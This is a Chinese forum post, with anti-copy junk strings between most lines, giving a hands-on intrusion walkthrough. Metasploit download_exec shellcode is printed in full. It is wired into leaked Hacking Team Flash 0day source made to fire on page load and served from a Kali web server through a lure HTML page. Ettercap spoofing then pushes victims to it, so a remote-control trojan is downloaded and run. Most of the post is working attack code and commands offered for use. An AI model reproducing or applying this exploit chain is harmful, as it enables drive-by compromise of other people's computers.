|
0 {; g+ f: S1 W7 Y& k B0 r. I
三、flash 0day之手工代码修改制作下载者实例入侵演示
( h( X1 k/ g% j$ S* s
: N3 j' J n! y6 H4 L! P. o D. D: m! w. n. N1 |, t
利用到的工具:
2 p: \' I! k/ s- N; g
0 p" _5 q, t E/ Q
* k, G9 u& l$ I7 A. E Msf - F K% N+ e) e% F. j. W! P$ t
5 @% j; {- s3 t* ?) q) k6 F( ]& I( F
+ ?" y9 {, j. @; R7 c8 j
Ettercap 4 s+ o+ \5 r; y6 ~0 ~7 K Z
" W4 Q! o/ a* {2 e! y0 N8 I, E9 _& d ?# I5 i9 a
Adobe Flash CS6 ! T$ i4 g7 O, b6 I5 [$ X
; {" l+ h! W7 c* l$ n2 ~
; T& Z$ u _& _' u3 ]6 T
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 9 }; A# Q3 g }3 M, i
- R r$ R& S ~) n
# e3 r* S$ P6 p5 X: q! `% A 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options $ N# T+ A/ m! j. z( L5 c
B* o1 G+ P j7 O) a4 ?! H& B3 ~1 i* V- }# ~% E- b3 e
如图:
6 D! P+ g3 G* j) s3 e" g4 m
) f6 b7 _2 M* w* m$ w" D, s4 `3 R6 q5 _% w% m
2 |$ K2 h7 R8 H7 }- x 4 l o) T8 p; W+ H2 n" I
$ z k) K" t0 u% ^( k  5 S' a# w9 i K' A- B
l7 `8 U9 `+ R
& A8 [; g% R% M9 l2 p5 ~7 R 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ^7 }$ }9 ~' O2 ?5 O, Z8 @
- @7 l5 q; U5 ^' q# ?
% x( }: G9 A7 F: }/ q8 |% T! E
8 s' [3 A' f2 y, W6 E3 H5 B
! o7 M% ^7 G$ b5 C
& b% J/ W7 X5 Q! F  ' q% G) Q9 o( t* c+ N, m2 F
# [- ^/ Q. d4 O# J7 C; b
+ h) y/ \, U7 M: S8 n6 f* m 然后执行generate -t dword生成shellcode,如下:
1 w0 e7 v! a* P" C 9 {- m% T# |/ r5 l% {5 j6 U* I5 F1 W
6 \3 ~) N$ l+ D
* P) K: a" X& s8 h$ Y& A3 p+ ]
" P4 d0 G- P0 |( e7 C9 d
# g# d1 [% @) i% D6 }! F 复制代码到文本下便于我们一会编辑flash exp,如下:
) q- T3 {# J( a4 N0 u( I7 S
" `. R/ ]" q& z8 ^5 H' y) C6 O
3 K! b1 Y& f( e$ W 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, * a0 G7 }2 }5 V
* l1 u' l5 d5 q5 O/ m" F
5 }: O7 \, O% H1 X! ~8 ?7 ?1 l
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + r# Q3 d, T! ^4 \
& p( _/ ^7 @3 ^3 g6 R/ h; B Z( K% M
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
1 P& w- E# ~: z, U 2 N5 s0 |: f; d" M# S9 a1 G
( n6 L- ?/ f& t5 @% u' I: i
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 n) z v' J5 v9 C$ p& X$ p. C* V
& S4 }. J% b& e2 `
% O; S0 q5 z1 `. h 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
5 [, c8 [- m) A* d! ^2 W2 j # `2 ~2 n' i; g
$ d; {/ c# _6 m. E) q0 U. f
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
% M+ I) O, I' [; P0 ^7 V& N @( F# H/ ^ t7 Q9 F. Y
' S% M8 F5 M) q6 i0 T
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . M- ^( _. d. K) k
8 v4 Y, x" r {( N# ~& p' T# M
& W# O8 Y8 r% D
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
' d( \1 \. K6 ?, _1 T+ ~8 Q 8 t& i" T* Y e# f/ L
) _* N* N2 O0 L 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
, C8 C2 ~. c6 o( W) S 0 h- v0 U% z, @' @( r7 S
% {& W% q1 a5 K. W5 G0 n! c
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ) I6 f P2 J- t- j, X
2 \( K; P3 p# b" y, ]
# ^% z/ s; {/ X z
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
5 F9 ~9 r, _, g( B: x
: C0 n: N+ o/ G# U' q3 s0 N( [( Q/ D1 m7 k7 _! _
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, / R0 e8 z% }+ D0 M& L) f3 J$ Z' Z9 y
# p/ g; w% A7 r/ }4 r1 ?8 n
0 r0 g; U8 g/ X1 w/ e4 p 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
6 f( N& p) R6 l! c9 B+ w
, z6 z9 V) _, a
! g0 n& D$ ^9 p% d, A 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
& x# P+ P! o4 N: d! m' j4 k2 d3 h
" ]; _8 {0 E1 C( A0 D8 L2 u! K) n6 m4 c: i: l
$ w) j3 u: Z% q7 g+ @) p
2 B6 J, @- u/ ~
' [. V' R& S$ X0 k f3 k
; t `8 V% o- Q- m $ l* Q' F2 g/ I d# _
: z# x$ B# ~1 c 下面我们来修改flash 0day exp,需要修改三个文件,分别为: ! t+ p. r4 N% K8 ?3 B" m
( ?! r; H# I S. x
! p% u$ G8 m5 a+ t Z ?
) S) M/ L; Z* W3 Z: \
8 N; f" c, }, i% g; ?' L1 O4 e8 N0 e* M3 K3 f9 Z
先修改ShellWin32.as,部分源代码如图:
& x+ Z8 P ^% ?/ e8 Z$ v 4 q" | ?" N( `' ?
/ \7 N8 N. ^% E I: t; ~ 
0 ?+ n: m5 g" [, a5 I$ ? 5 L( A9 }# \# L6 E! E' i# A" ~5 ^, O
! T$ m( B @: k 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: : ^6 q, V6 l6 |7 ~- L, e
* g3 T& t0 G- W% @
8 y: a/ p# J" t5 y. k" z  : u9 J; l+ B* {
6 l- ^% o( _( Z6 D' d
3 B3 `# p' h7 S 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 q: j" l: n1 M9 w
" C2 ?9 @( ]$ y" u; y0 P* \+ [. a3 g* L. n" E" l I
 ; T, ^) K+ A7 Y, |# e9 v
+ f- t5 @! l2 n' }
6 G# S8 n# b+ ~8 C' t1 \ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
! u: ^. r1 W) y9 L% t $ ^6 n, L+ e( f _
& }! c5 T! c$ ]6 N& l1 j
, z$ A6 f; a/ ?, X \
+ r5 e) r7 E3 T
P0 S5 O4 ?! k8 J- f8 K . w s; j- b9 x
/ N2 F4 T$ I1 ?
' A7 T3 N4 a2 m8 T' W
 9 {. L6 O3 c) ^* J
: _3 s' t* t2 C% F( N
0 M) _" c. p1 O0 {7 K9 Q 然后点保存,下面我们来编译一下,打开 : X( d& ^' i }. g
; z$ I: B# `$ m7 i8 W f( K: ^. q5 L( T9 `" j* P4 C8 e& }
exp1.fla然后点文件-发布,看看编译没错误 5 N) s! O/ n/ W# c% g$ R' ^$ w9 p
# Q0 _& U3 I2 i, w# a; f
8 c* D3 _9 u9 _; @5 h
2 [, S' w+ @4 {. M0 L% N. u
4 n: x( `5 Z0 Y% P
# n J" c, J ?
0 i3 {, }8 C! S8 |) b1 k# q4 k
5 `1 g! C& L% u) k' V
, Y$ }3 N v) k+ _) Y" Y( N
1 H1 ~. y: d+ Z, B ! C. X1 d$ E% S6 f. X
& Z$ r& @. v6 |; w3 ~0 l' w+ r
 7 a. p( C3 q, T3 e* H- X
/ l* u% d/ L" V( J0 {7 i
, j5 Y- a! D: [ 然后我们把生成的 : t0 }8 p# j0 ]' c: h3 |- P a
+ P$ f5 ]7 P {( ?6 ^! p C8 J2 D% w9 }
2 ]3 \3 E, R7 \$ O) W- q* n: _( }
exp1.swf丢到kailinux 的/var/www/html下: + _. ?8 E9 i. a/ v7 |1 }/ H- D
# a9 H4 c0 B( s8 Z* u) ]( p
2 o; e6 J$ w- E% c6 z7 s8 q 然后把这段代码好好编辑一下
( Y/ V$ Y5 t* p6 k6 W3 v
% x! m; k6 F( B. i8 G/ y
% k3 g& M7 B- d 8 W* v; Q+ s" n! e
, f1 V" o9 z/ I4 A2 D9 b" ]) L3 f# R; M
+ S! S/ D. m* S8 m6 [5 g* c
( [ F1 [! J* A
/ k; v/ P; }2 y/ e6 t
3 S3 m/ E/ r5 ^! K' @
$ e' C p9 s4 e' F. Y* v' T
9 b" I: s: z4 X* P. E# H( V
4 Q/ ]9 E& l2 |
6 k, `9 K6 n1 N! Z5 t
. H7 W: R$ F8 M& e$ K* ^* A+ A0 @" Q
% M; R* ~9 z, T
: V$ `+ s+ N8 d/ y: u
8 T' i9 T4 N7 [' v( C
V7 L V; _" u5 |
8 I* n, U% b/ C6 g* H6 [5 a& E6 e6 X' c/ \
<!DOCTYPE html> * N& o& m9 |( b( p
, j# v& @6 m) d' F& f$ ^; c9 r8 o3 u' H
: ]8 W; ~' V- k <html>
" r) b0 ?0 J( b" q- I - r) s7 ]- F9 U- |2 Q' f
% w0 z! r% V$ R8 M+ F! o2 L
<head> , I: l+ t) l( a3 l' w$ J9 S
/ I# u6 \) @# w2 w3 t
) ]/ R+ F: N" Z/ T% H; _ <meta http-equiv="Content-Type" content="text/html;
! [4 Z! t( Y- c1 u8 Z! T; O! ] ) I! H8 o; M% Q0 r
# d3 f' L& G& u- n- b8 l charset=utf-8"/>
. x4 M5 D2 \8 e V1 i" x' ~1 C 7 t4 {4 s6 r; p# s* L0 _$ E9 Z
" t8 t9 [; S1 `" i- l </head>
1 ?- C/ G- S! Z7 U7 }; P
, }6 [- o5 v) S- h1 F3 E
3 F' u9 }5 l0 x9 ^. B; ]2 [ <body> 8 @3 ?2 B' }) h5 v+ O
4 Z0 ~2 I/ y7 W4 \9 E4 z% S8 X b
; d( X& \& d+ v <h2> Please wait, the requested page is loading...</h2>
, a- H- J9 h- ?& Q0 @9 K% ~$ s% y
- q- v F7 W9 l8 B
- g# ?* I# A! ?- n7 C* U <br>
! v7 U7 {! t) x. K0 L* _ o $ `( G6 _: E H- t
! F2 B+ u) s2 T/ z# Y: C <OBJECT ' p8 Q7 m S! Z
3 l' P+ l1 O3 y) Q3 R6 b* w: n" y/ {6 j0 g V# y$ I
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
" u, ? L) ^$ Q: v/ r
; C& `6 ?! K6 n+ w0 g: u
3 }: j; q+ W R) s1 x6 I3 B VALUE="http://192.168.0.109/exp1.swf"></OBJECT> & k( [, `% z, y* @9 y) b! i
/ Y# @5 ^: q, o8 F3 {! m9 h+ x& a3 u P o
</body>
- A t( L7 t( b! B' E" n5 i5 g ' h/ J6 L% V" ~. ~
9 D7 l+ @! f' w% T- ? <script> 0 z, [7 }3 e' N; M u* I
; Q$ Z9 o* a8 [6 Z- y$ A
! O* h% J4 Q- o9 {% X6 e9 Z7 \ setTimeout(function () { . P: M9 R0 O8 a3 l& D9 R
1 D0 z* N8 |6 M# [! s1 }0 J. K7 z+ T7 j
9 L z4 K6 R0 d9 j
- e! Q, Z2 ?( {* G, \2 }3 D( i
0 @& J) S" u$ d0 i* ~" ]" t( D window.location.reload();
: J. {! h7 q) l# H
j/ T" J" |$ h q" W, [% c4 g' D! B" B( t7 X! J
}, 10000);
& q7 n, r8 z- f* i6 E
7 ^$ b+ G- y# [6 R( }- l: |& h
1 c0 M. N; C$ r2 G3 v # _6 r* S' T; \: F; D
* c% t' m, Q% H! S- y, K7 ]+ o. J
) u; z+ [# q Z( J </script>
9 C: e2 Q5 ^, v: r; H
0 \* R. S5 V" j" J( ?8 G* [( W; ~7 m9 W2 ^1 }# t
</html>
* B0 O2 g9 T( H3 ]+ I8 C Q6 X) m $ E, S% i" K/ n7 v
/ a; C4 L$ m. o" H5 p
0 O# v% z9 r5 r8 |" J2 p, `" j
- v9 Q& ]) g% j1 Q
" j4 F# S/ ~0 q/ f, O 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 7 Z5 B. J* h! M5 W p( U1 Y. D
7 H) l- o3 ]$ s0 S& H- y* z8 _0 ^6 p9 ^9 v$ K' R% p
7 E( o, Y7 I8 I8 [* z: L1 J8 l
8 x& q* H) {' n0 O' R2 k+ I# _+ N$ ]' w% F: s
3 f0 A, o. s$ J6 [6 a7 \
0 |0 l+ r3 q. j" g2 M* Q0 I( v4 }* t2 Q9 q e
7 z7 A/ H: Q* }# G% I- ] y
6 ~; n! F) z0 Q0 |% @: D9 u% Q$ J
- J9 r' A; U& P i
: m8 C: {/ }7 l& I ! F$ L7 K* B7 f- M+ b- m$ f
- k! x8 }& z8 _( `$ M7 d5 D$ a' Y, _ ; M" C6 M! j0 z
: W x* R( k4 V1 B# @, u
! ]% c% N; K- U! m5 ^ 下面我们用ettercap欺骗如图:
; a9 A# y$ \1 n$ m' O- _6 F
* v. m# I; o6 i3 T: w8 ]0 a! [! C* \3 u
 * t/ z; K$ c+ Y; N+ |
' H! |4 i2 |! \- c! J
+ S6 x7 V! n6 {! r0 Q: U1 ^
. n9 B- G+ I* k0 W/ z9 W 6 z2 u& m* _+ X! V
+ [+ ~" O- K! v, p* R 下面我们随便访问个网站看看:
0 s$ j' T6 ^! o- [8 p
( j% V" [2 o. ]" P% z9 S
- Q4 s- B- M* E# ]/ j 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
' Z W: l1 S) N8 w* ^, A
9 y$ U+ o2 H0 }( z' C* @8 f3 r% J2 Q, Z2 L
 . C3 g7 \) z3 a
2 I# C; R! y1 A& T: q4 b
/ |6 N' n$ r: e1 G5 r4 q- u 我们看另一台, ! }: x* L% d$ f6 L6 }1 C+ z8 Q
; V, j0 ^/ k- ~/ r* n& t7 \2 W
: U( I. C9 m6 f- X 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
0 |/ T6 J+ {/ K6 A; G6 z3 A/ ~ | 
发表于 2018-10-20 20:28:55
收藏
支持
反对